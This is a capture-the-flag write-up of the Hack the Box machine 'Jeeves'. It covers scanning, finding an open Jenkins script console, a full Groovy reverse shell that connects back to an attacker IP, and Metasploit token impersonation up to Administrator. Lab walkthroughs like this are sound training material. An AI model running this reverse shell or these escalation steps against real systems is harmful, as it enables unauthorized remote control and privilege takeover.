Jeeves

Overview

Jeeves is a vulnerable machine from Hack the Box that requires some basic enumeration and directory fuzzing. The foothold is accomplished after some enumeration of web pages and gaining access to the Jenkins login, and the privilege escalation is done with token impersonation similar to the Alfred box on TryHackMe.

Nmap Scan

sudo nmap -Pn -sS 10.10.10.63 -vvv

• 80/tcp open http syn-ack
• 135/tcp open msrpc syn-ack
• 445/tcp open microsoft-ds syn-ack

• 50000/tcp open ibm-db2 syn-ack

  http-title: Ask Jeeves

Basic Enumeration

After exploring the web page on port 80, we just get an image on the page. Not really a major bit of information, but it does give us some data that we can still take note of for later on:

• Microsoft SQL server 2005 on the backend
• https://eclipse.dev/jetty/

  • Jetty has a vulnerability: Information Disclosure

    java/webapps/50438.txt

Port 50000 is the port for us to look through. Smbclient enumeration on port 445 didn’t yield anything for us.

• Using a directory fuzzer, we find the askjeeves directory. We have direct access without logging in.
  • http://10.10.10.63:50000/askjeeves/
  • Jenkins version 2.87 running.
  • Without having to log in, we are able to find a script console.
  • We can pass groovy script to execute code/commands.

Foothold

Documentation on Groovy Scripts

We can find and use a reverse shell for groovy script, and get a connection back on our machine with nc.

String host="10.10.16.3";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

We get a shell back on this, and are user jeeves\kohsuke. We can access user.txt.

Local Enumeration

Checking the users on the host, the only other user than jeeves is Administrator.

• We can find what privileges we have using whoami/priv:

  SeShutdownPrivilege | Shut down the system | Disabled
  SeChangeNotifyPrivilege | Bypass traverse checking | Enabled
  SeUndockPrivilege | Remove computer from docking station | Disabled
  SeImpersonatePrivilege | Impersonate client after authentication | Enabled
  SeCreateGlobalPrivilege | Create global objects | Enabled
  SeIncreaseWorkingSetPrivilege | Increase a process working set | Disabled
  SeTimeZonePrivilege | Change the time zone | Disabled
  

• We run systeminfo on the current shell, and copy the output to a file. On kali, we can run Windows Exploit Suggester to get some potential path’s to escalate privileges.
• If we get a meterpreter shell on the host as well, we can do the same thing through msfconsole.

Privilege Escalation

Bring up the msfconsole.

• use exploit(multi/script/web_delivery)
• when in the meterpreter shell, run post/multi/recon/local_exploit_suggester
• use exploit/windows/local/ms16_075_reflection_juicy
  • Load incognito, then we can list out tokens.
  • list_tokens -u, -g
  • The user token didn’t work for us, but the group token seems to work.
• We were able to impersonate the BUILTIN\Administrators group.

Looking at the Administrators Desktop, the file we see is hm.txt. When we read it, it tells us to dig more basically.

• We can read alternative data streams, by running dir /R, we can see the other data stream Malware Bytes Blog.
• We run this, and we can finally read the file: more < hm.txt:root.txt:$DATA